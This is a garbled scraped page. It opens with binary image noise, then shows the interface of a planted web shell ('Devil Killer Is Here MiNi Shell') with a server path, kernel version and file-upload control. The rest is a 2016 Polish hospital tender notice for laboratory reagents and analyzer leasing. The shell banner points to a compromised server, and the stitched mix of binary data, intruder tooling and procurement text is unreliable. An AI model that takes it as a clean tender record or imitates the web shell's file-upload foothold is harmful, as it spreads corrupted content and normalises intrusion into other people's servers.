JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/100737-N-2016.html

<p class="kh_header"><b>Iława: dostawa odczynników wraz z dzierżawą analizatora do badań immunofluorescencyjnych; dostawa odczynników wraz z dzierżawą analizatorów do badań z zakresu hematologii- morfologia CBC + 5DIF; dostawa szybkich testów do oznaczania substancji uzależniających i narkotyków; dostawa szybkich testów do wykrywania kalprotektyny; dostawa odczynników wraz z dzierżawą analizatorów do paskowej analizy moczu; dostawa szybkich testów do wykrywania Streptococcus pneumoniae w moczu oraz dostawa systemu aspiracyjno- próżniowego dla potrzeb Laboratorium Diagnostycznego</b><br>
<b>Numer ogłoszenia: 100737 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa odczynników wraz z dzierżawą analizatora do badań immunofluorescencyjnych; dostawa odczynników wraz z dzierżawą analizatorów do badań z zakresu hematologii- morfologia CBC + 5DIF; dostawa szybkich testów do oznaczania substancji uzależniających i narkotyków; dostawa szybkich testów do wykrywania kalprotektyny; dostawa odczynników wraz z dzierżawą analizatorów do paskowej analizy moczu; dostawa szybkich testów do wykrywania Streptococcus pneumoniae w moczu oraz dostawa systemu aspiracyjno- próżniowego dla potrzeb Laboratorium Diagnostycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa odczynników wraz z dzierżawą analizatora do badań immunofluorescencyjnych; dostawa odczynników wraz z dzierżawą analizatorów do badań z zakresu hematologii- morfologia CBC + 5DIF; dostawa szybkich testów do oznaczania substancji uzależniających i narkotyków; dostawa szybkich testów do wykrywania kalprotektyny; dostawa odczynników wraz z dzierżawą analizatorów do paskowej analizy moczu; dostawa szybkich testów do wykrywania Streptococcus pneumoniae w moczu oraz dostawa systemu aspiracyjno- próżniowego dla potrzeb Laboratorium Diagnostycznego Powiatowego Szpitala im. Władysława Biegańskiego w Iławie - nr sprawy 21/2016

Zadanie nr 1 Dostawa odczynników wraz z dzierżawą analizatora do badań immunofluorescencyjnych
Zadanie nr 2 Dostawa odczynników wraz z dzierżawą analizatorów do badań z zakresu hematologii- morfologia CBC + 5DIF
Zadanie nr 3 Dostawa szybkich testów do oznaczania substancji uzależniających i narkotyków
Zadanie nr 4 Dostawa szybkich testów do wykrywania kalprotektyny
Zadanie nr 5 Dostawa odczynników wraz z dzierżawą analizatorów do paskowej analizy moczu
Zadanie nr 6 Dostawa szybkich testów do wykrywania Streptococcus pneumoniae w moczu
Zadanie nr 7 Dostawa elementów systemu aspiracyjno-próżniowego

Obowiązki Wykonawcy :
1) Dostawa i transport
2) Rozładunek i wnoszenie do pomieszczeń magazynowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.1 W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.1 SIWZ posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem- Załącznik nr 2. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.2. 	W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.2 posiadania wiedzy i doświadczenia, dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.3 W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.3 W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.4. W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.4 znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że znajduje się sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">3.5.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego - dla zadania nr 3, zadania nr 4 oraz zadania nr 6  Zamawiający żąda dostarczenia wraz z ofertą dla każdego testu oryginalnej ulotki.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.1.	 Wypełniony formularz ofertowy (wg wzoru załącznika nr 1 do SIWZ),3.4. Wypełniony i podpisany formularz Specyfikacji przedmiotowej formularz cenowy (Załącznik nr 4)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin dostawy - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.1 Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania,
 w przypadku:
1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
W przypadku zmiany podatku Vat cena brutto pozostaje bez zmian, zmianie ulega cena netto.
6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
17.2. Wprowadzenie zmian określonych w ust. 2 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa odczynników wraz z dzierżawą analizatora do badań immunofluorescencyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków wykonawcy należy zapewnienie właściwej temperatury w pomieszczeniu, w którym Zamawiający zamierza zainstalować analizator (zamontowanie klimatyzatora) 1.	D- Dimer	oznaczenie	7000		 	 		 	 	 
2.	Borelioza IgM	oznaczenie	1200							 
3.	Borelioza IgG	oznaczenie	1600							 
4.	NT-ProBNP	oznaczenie	600							 
5.	Mononukleoza - EBNA IgG	oznaczenie	120							
6.	Mononukleoza - VCA / EA IgG	oznaczenie	360							
7.	Mononukleoza - VCA IgM	oznaczenie	420							
8.	Kontrola , kalibratory , materiały eksploatacyjne i usługa serwisowa na 24 m-ce 								
										
9	Dzierżawa Spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.1 Wymagania konieczne odnośnie analizatora	miesiąc	24 	Nie dotyczyWymagane parametry analizatora przeznaczonego do oznaczeń metodą immunofluorescencyjną.
Lp.	Opis urządzenia 
1.	Wieloparametrowy analizator do badań immunodiagnostycznych metodą enzymoimmunofluorescencyjną. 
2.	Analizator przeznaczony do pracy na stole laboratoryjnym.
3.	Stała gotowość aparatu do pracy przez 24 h na dobę bez przerw powodujących niedostępność analizatora do rutynowej pracy.
4.	Aparat nie wymagający wykonywania czynności startowych (płukanie, wstawianie dodatkowych odczynników takich jak substraty, płyny dekontaminujące i materiałów zużywalnych).
5.	Brak płynów płuczących i odczynników dodatkowych koniecznych do rutynowej obsługi aparatu.
6.	Minimum 12 miejsc pomiarowych 
7.	Aparat bezigłowy - wykluczenie możliwości kontaminacji próbki (przeniesienia oznaczanego składnika pomiędzy próbkami) i zakażenia personelu (jednorazowe zestawy testowe dla jednego pacjenta).
8.	Kompletne zestawy odczynników (zestawy testowe, kalibratory i kontrole wchodzące w skład zestawu).
9.	Zestawy odczynników, których otwarcie nie skraca terminu ważności opisanego na zestawie odczynnikowym.
10.	Krzywa kalibracyjna przechowywana w pamięci aparatu, a rekalibracja wykonywana nie częściej niż co dwa tygodnie.
11.	Rekalibracja jednopunktowa dla wszystkich oznaczeń hormonów płciowych i markerów nowotworowych. 
12.	Wykonywanie badań immunochemicznych, chorób zakaźnych i parametrów hemostazy.
13.	Bezpłatne przekazanie protokołów transmisji 
14.	zew. Komputer do podłączenia do sieci.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa odczynników wraz z dzierżawą analizatorów do badań z zakresu hematologii- morfologia CBC + 5DIF.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników, materiałów eksploatacyjnych i kontroli niezbędnych do przeprowadzenia 28 000 oznaczeń morfologii w okresie 8 miesięcy wraz z dzierżawą analizatorów: głównego - automatycznego analizatora hematologicznego typu CBC-5DIFF, z kompatybilnymi technologicznie i odczynnikowo dwoma aparatami typu back-up stanowiącymi jednolity zwalidowany system analityczny (aparat główny 20 000 oznaczeń, aparat back-up I z podajnikiem 5 000 oznaczeń; aparat back-up II 3 000 oznaczeń; badania w trybie CBC 60%, w trybie DIFF 40%).
1.	Badania wtrybie CBC + oznaczanie kotroli ( wszystkie materiały eksploatacyjne i części zużywalne )	oznaczenie	17 000		 	 		 	 	 
2.	Badania w trybie CBC + 5DIF + oznaczanie kotroli ( wszystkie materiały eksploatacyjne i części zużywalne )	sztuka 	11 000							 
3.	Dzierżawa analizatora spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.2 Wymagania konieczne odnośnie analizatora
Aparat główny- 20 000 oznaczeń	miesiąc	8							 
4.	Dzierżawa analizatora spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.2 Wymagania konieczne odnośnie analizatora
Aparat back-up I - 5 000 oznaczeń	miesiąc	8							
5.	Dzierżawa analizatora spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.2 Wymagania konieczne odnośnie analizatora
Aparat back up II - 3 000 oznaczeń	miesiąc	8							
Tabela nr 1.2 Wymagania konieczne odnośnie analizatora
L.p.	Warunek graniczny
1.	Zamawiający wymaga trzech analizatorów, mogą być używane.
2.	Wydajność dla analizatora głównego w każdym dostępnym trybie i sposobie pracy minimum 80 oznaczeń/godzinę, aparatów back-up minimum 60 oznaczeń/godzinę.
Wymagana praca w trybach CBC, CBC-DIFF, z oszczędnością odczynników w trybie CBC dla każdego z oferowanych aparatów. 
3.	Automatyczna analiza wszystkich dostępnych na aparatach parametrów (minimum 24 parametry), wspólnych dla wszystkich aparatów i raportowanych na wyniku, m.in.: WBC, NEUT  i , LYMPH  i , MONO  i , EO  i , BASO  i , HGB (oznaczanie metodą bezcjankową), HCT, RBC, PLT.
4.	Parametry oznaczane bezpośrednio przez analizatory, nie wyliczane z innych parametrów: RBC, HGB, PLT, WBC, LYMPH, MONO, EO, BASO.
5.	Automatyczny pomiar oraz bezpośrednie różnicowanie WBC dokonywane bez barwienia cytochemicznego, z wykorzystaniem stabilnego źródła światła lasera półprzewodnikowego w oparciu o cytometrię przepływową we wszystkich oferowanych aparatach.
6.	Minimalne wymagane zakresy liniowości parametrów, z pierwszego oznaczenia bez rozcieńczania, dla wszystkich aparatów: WBC - 250 x10/ul; PLT - 2500 x10/ul, HGB - 25g
7.	Musi istnieć możliwość wykonywania oznaczeń płynów z jam ciała bez żadnych dodatkowych odczynników przez analizator główny.
8.	Maksymalna, wymagana objętość próbki aspirowanej przez aparaty z pierwszej analizy: tryb podajnikowy do 150 ul, w trybie manualnym do 100ul. 
Jeden z oferowanych analizatorów musi wykonywać pełne oznaczenie 24 parametrowej morfologii krwi z objętości nie przekraczającej
50ul, ze względu na wykonywane badania dla SOR, Oddziału Pediatrycznego i Pododdziału Neonatologicznego.
9.	Analizator główny wyposażony w pełni automatyczny podajnik z mieszalnikiem na minimum 50 próbek oczekujących na analizę, z możliwością ciągłego dostawiania nowych próbek bez konieczności przerywania cyklu pomiarowego, ani zatrzymywania pracy podajnika. Możliwość stosowania jednocześnie w trybie podajnikowym różnych typów probówek zamkniętych systemów pobrań. Możliwość oznaczania pojedynczych próbek w systemie podajnikowym. 
Dodatkowo jeden z aparatów back-up musi być wyposażony w podajnik na min. 20 próbek
10.	Oferowane analizatory muszą mieć oryginalne odczynniki, materiały kontrolne i zużywalne oraz pochodzić od jednego producenta.
Wspólny system odczynnikowy aparatów pochodzący od producenta aparatów i przez niego zwalidowany - możliwość wymiany odczynników pomiędzy analizatorami celem wykonania morfologii CBC+5DIFF. 
11.	Oferowane odczynniki muszą być kompatybilne pomiędzy wszystkimi oferowanymi analizatorami. Odczynniki stosowane w analizatorze głównym muszą zapewnić oznaczenie wymaganych wspólnie 24 parametrów na obu analizatorach back-up
12.	Wszystkie odczynniki potrzebne do wykonania morfologii na oferowanych aparatach w pełni bezcyjankowe.
13.	Program kontroli jakości z możliwością graficznej prezentacji w oferowanych aparatach.
14.	Krew kontrolna producenta sprzętu dostępna w probówkach systemu zamkniętego, dostosowanych także do pracy z automatycznym podajnikiem. Jeden rodzaj krwi kontrolnej dla wszystkich oznaczanych parametrów.
Bezpłatne włączenie aparatów do systemu kontroli jakości wszystkich parametrów on-line, wyniki kontroli dostępne w internecie chwilę po ich wykonaniu, z natychmiastową informacją w przypadku błędów.
15.	Zapewnienie udziału w Zewnętrznej Kontroli Laboratoryjnej - Sowa Med.
